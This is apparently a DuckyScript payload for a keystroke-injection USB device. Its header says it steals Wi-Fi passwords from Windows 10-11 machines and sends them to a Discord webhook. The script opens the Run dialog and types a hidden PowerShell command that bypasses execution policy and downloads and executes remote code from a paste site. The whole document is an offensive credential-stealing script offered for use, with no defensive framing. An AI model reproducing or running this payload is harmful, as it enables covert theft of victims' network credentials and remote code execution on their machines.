REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |                                       |
REM # Description  : A script used to stole target WLAN Passwords.    |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 0.0                                              |
REM #                                                                 |
REM ###################################################################

DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass $webhookUrl='<your_webhook_here>';irm ghostbin.site/u197r/raw | iex